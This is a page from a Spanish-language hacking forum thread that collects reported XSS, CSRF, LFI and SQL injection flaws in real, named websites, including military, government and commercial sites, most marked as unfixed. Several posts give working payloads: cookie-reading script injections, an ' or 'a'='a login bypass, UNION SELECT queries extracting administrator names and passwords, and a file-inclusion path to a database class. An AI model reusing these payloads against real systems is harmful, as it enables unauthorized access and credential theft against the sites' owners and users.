elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 85,797 veces)
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #20 en: 19 Febrero 2010, 05:44 am »
Sitio web: http://www.ejercito.cl
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/02/19/xss-www-ejercito-cl-ejercito-de-chile/
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: XSS en el error de mysql que se muestra :x

http://www.ejercito.cl/nuestro_ejercito/discursos.php?id=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
En línea
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #21 en: 19 Febrero 2010, 06:01 am »
Sitio web: http://www.megaupload.com
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/02/19/csrf-www-megaupload-com/
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: CSRF (Cambio de idioma arbitrario)

http://megaupload.com/?setlang=es a español
http://megaupload.com/?c=contact&setlang=de a aleman
http://www.megaupload.com/?d=9450P71D&setlang=fr a frances

NOTA: "TODAS" las urls de megaupload son vulnerables, por lo tanto desde cualquier parte pueden cambiar el idioma a quien quieran con tan solo mandarle el link
En línea
ElAntiguoTroll

Desconectado Desconectado

Mensajes: 32


Oh Un antiguo troll Oh Un antiguo troll


Ver Perfil
SQL Injection Nuevas Generaciones del PP
« Respuesta #22 en: 16 Mayo 2010, 18:57 pm »
Sitio web: http://www.nngg.org
Descubridor: EgoPL
Fecha de descubrimiento: 22/08/09
Fecha de publicación: 16/05/10
URL del aviso: http://twitter.com/EgoPL/status/14108571687
Arreglado: No
Información Adicional:
El panel de admin esta en el subdominio intranet.
« Última modificación: 16 Mayo 2010, 19:04 pm por ElAntiguoTroll » En línea
SH4V

Desconectado Desconectado

Mensajes: 39



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #23 en: 18 Mayo 2010, 18:32 pm »

Sitio web: http://es.msn.com/
Descubridor: SH4V
URL del aviso: http://txt.io/sh4v
Fecha de descubrimiento: 18 de mayo de 2010
Fecha de notificación: 18 de mayo de 2010
Fecha de publicación: 18 de mayo de 2010
Arreglado: no
Vulnerabilidad: XSS

Código:
http://populus.es.msn.com/participa.aspx?nombre=";}if (1){alert(document.cookie);//
« Última modificación: 18 Mayo 2010, 18:35 pm por sh4van3 » En línea
Citar
javascript:đ=+!!{};(this)[ł={ŋ:''+!'[]',ŧ:''+!!đ},ł.ŋ[đ]+ł.ŋ[đ+đ]+ł.ŋ[++đ+đ]+ł.ŧ[--đ]+ł.ŧ[+!đ]](đ)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #24 en: 9 Junio 2010, 22:04 pm »
Sitio web: www.dragonjar.org
Descubridor: csaralg
URL del aviso: http://comunidad.dragonjar.org/f179/test-xss-10064/
Fecha de notificación: Miércoles 8 de Junio
Fecha de publicación: Miércoles 8 de Junio
Arreglado: No
Vulnerabilidad: XSS
Código:
http://comunidad.dragonjar.org/f179/test-xss-10064/#post27048
En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Guide_Shen

Desconectado Desconectado

Mensajes: 24


http://guideshen.blogspot.com


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #25 en: 12 Julio 2010, 04:00 am »
Sitio web: http://www.fuckbook.com
Descubridor: sh3n
URL del aviso: http://guideshen.blogspot.com/2010/07/xss-in-fuckbook.html
Fecha de descubrimiento: 10/07/2010
Fecha de notificación: 11/07/2010
Fecha de publicación: 11/07/2010
Arreglado : No, UNFIXED
Información adicional:
Código:
http://www.fuckbook.com/member/profile_sh3n.html
En línea
Evolution of Revolution  -  http://xsstorm.blogspot.com
t3kyla

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #26 en: 13 Septiembre 2010, 07:30 am »
Sitio web: http://www.satt.gob.pe
Descubridor: T3kyla
URL del aviso: http://t3kyla.wordpress.com/2010/09/13/sql-injection-en-satt-gob-pe/
Fecha de descubrimiento: 12/09/2010
Fecha de notificación: 12/09/2010
Fecha de publicación: 12/09/2010
Arreglado : No
Información adicional:
Código:
http://www.satt.gob.pe/Servicios%20al%20Ciudadano/Servicio%20Atencion%20Virtual/SAV_Valida.asp?Persona_Activo=&Act=&txtUsuario=t3kyla%27%20or%20%27a%27=%27a&txtClave=123456
En línea
Ari Slash


Desconectado Desconectado

Mensajes: 1.783



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #27 en: 20 Septiembre 2010, 18:07 pm »
Sitio web: http://www.federacionchilenaderemo.cl
Descubridor: Ari-Slash
URL del aviso: h4ckvi505.wordpress.com/2010/09/20/federacion-chilena-del-remo/
Fecha de descubrimiento: 20 de septiembre 2010
Fecha de notificación: 20 de septiembre 2010
Fecha de publicación: 20 de septiembre 2010
Arreglado: No
Vulnerabilidad: SQLI en el buscador

nota: No doy mas info de codigo sql por posibles lamerias

saludos
« Última modificación: 25 Septiembre 2010, 22:36 pm por Ari-Slash » En línea
Ari Slash


Desconectado Desconectado

Mensajes: 1.783



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #28 en: 25 Septiembre 2010, 22:35 pm »
Sitio web: www.almatec.com.ar
Descubridor: Ari-Slash
URL del aviso: h4ckvi505.wordpress.com/2010/09/25/vulnerabilidad-www-almatec-com-ar/
Fecha de descubrimiento: 20 Enero 2010
Fecha de notificación: 20 de Enero 2010
Fecha de publicación: 25 de septiembre 2010
Arreglado: Si, pero ahora da lugar a un SQLI
Vulnerabilidad: LFI, SQLI y BLIND SQLI
Informacion adicional: el arreglo consistio en dar un id unico a cada archivo que se subia, de la forma download.php?id=
pero esa solucion dio lugar a sqli, siempre tomando el 2 campo del select debido a que debian retornarse cierta cantidad de columnas.

LFI (reparado):
Código:
download.php?file=admin/includes/Class.DB.php

SQLI:
Código:
descargas2.php?id=4%20union%20select%20id,nombre,password,4%20from%20administrador%20where%20id=1;--
descargas2.php?id=4%20union%20select%20id,password,nombre,4%20from%20administrador%20where%20id=1;--
« Última modificación: 25 Septiembre 2010, 22:40 pm por Ari-Slash » En línea
Guide_Shen

Desconectado Desconectado

Mensajes: 24


http://guideshen.blogspot.com


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #29 en: 15 Octubre 2010, 10:09 am »
Sitio web:  http://comunidad.terra.com
Descubridor: sh3n
URL del aviso: http://www.xssed.com/mirror/69836/
Fecha de descubrimiento: 12 de Octubre del 2010
Fecha de notificación: 12 de Octubre del 2010
Fecha de publicación: 14 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/aWUdux


Saludos
Hace unos dias publique otro post pero creo q fue borrado o movido, dejo una copia


Sitio web:  http://search.discovery.com
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/discovery-channel-xshacked.html?spref=tw
Fecha de descubrimiento: 12 de Octubre del 2010
Fecha de notificación: 12 de Octubre del 2010
Fecha de publicación: 14 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/9MKuAi



P.D
Si por algun motivo eliminan este post agradeceria que me informaran
En línea
Evolution of Revolution  -  http://xsstorm.blogspot.com
Páginas: 1 2 [3] 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recopilatorio de C#
.NET (C#, VB.NET, ASP) 		/* strcpy() */ 3 8,166 Último mensaje 5 Junio 2007, 17:50 pm
por piroman
Como hacer update en SQLinjection
Nivel Web 		BlackHKR 6 6,293 Último mensaje 12 Mayo 2010, 20:55 pm
por BHK
Duda SQLinjection en information_schema « 1 2 »
Nivel Web 		miguelskk 10 8,133 Último mensaje 17 Julio 2010, 01:46 am
por TapIt
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking 		NetStorm 1 3,559 Último mensaje 5 Octubre 2011, 00:06 am
por alpha015
SQLInjection sin acceso a information_schema
Nivel Web 		buggy_man 3 3,119 Último mensaje 11 Agosto 2012, 07:17 am
por afdlkglfgfdgfhgf
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines